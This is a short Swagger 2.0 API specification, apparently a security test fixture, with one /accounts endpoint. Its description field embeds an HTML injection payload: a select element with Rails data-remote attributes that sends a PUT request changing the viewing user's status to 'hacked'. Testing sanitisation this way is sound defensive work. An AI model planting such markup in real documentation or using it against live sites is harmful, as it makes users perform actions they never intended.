swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: "Choose here: <select data-method=\"put\" data-params=\"message=hacked\" data-remote=\"true\" data-url=\"/api/v4/user/status\"><option>Change your profile</option><option>Edit your profile</option></select>"
  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
